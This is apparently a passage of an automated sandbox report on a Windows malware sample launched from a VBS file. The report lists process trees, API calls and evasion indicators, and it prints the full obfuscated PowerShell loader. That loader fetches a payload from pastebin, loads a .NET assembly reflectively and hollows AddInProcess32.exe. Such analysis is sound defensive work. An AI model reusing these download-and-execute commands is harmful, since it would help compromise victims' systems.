Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041CBE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B9811ED pushad ; ret 1_2_00007FFD9B981232
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B97113D pushad ; ret 3_2_00007FFD9B971192
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B97DC93 push ebx; retf 3_2_00007FFD9B97DCBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B97DCC2 push ebx; retf 3_2_00007FFD9B97DCBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD9B9B11A3 pushad ; ret 6_2_00007FFD9B9B11B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00457186 push ecx; ret 8_2_00457199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041C7F3 push eax; retf 8_2_0041C7FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW, 8_2_00406EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_0041AADB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040F7E2 Sleep,ExitProcess, 8_2_0040F7E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA40FC5 sldt word ptr [eax] 3_2_00007FFD9BA40FC5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 8_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1666
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1388
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3610
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6222
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4090
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 5272
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 4192
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: foregroundWindowGot 1735
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748 Thread sleep count: 3610 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748 Thread sleep count: 6222 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 Thread sleep count: 4090 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep count: 4430 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180 Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396 Thread sleep count: 171 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396 Thread sleep time: -85500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 Thread sleep count: 5272 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 Thread sleep time: -15816000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 Thread sleep count: 4192 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400 Thread sleep time: -12576000s >= -30000s
                    Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000002.1947421542.000002603DC8D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: PING.EXE, 00000005.00000002.1760881316.000002468DF39000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaaN
Source: powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | API call chain: ExitProcess graph end node | graph_8-48316
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00434A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041CBE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00443355 mov eax, dword ptr fs:[00000030h] 8_2_00443355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004120B2 GetProcessHeap,HeapFree, 8_2_004120B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_0043503C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0043BB71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00434BD8 SetUnhandledExceptionFilter, 8_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D17008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_00412132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00419662 mouse_event, 8_2_00419662
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a
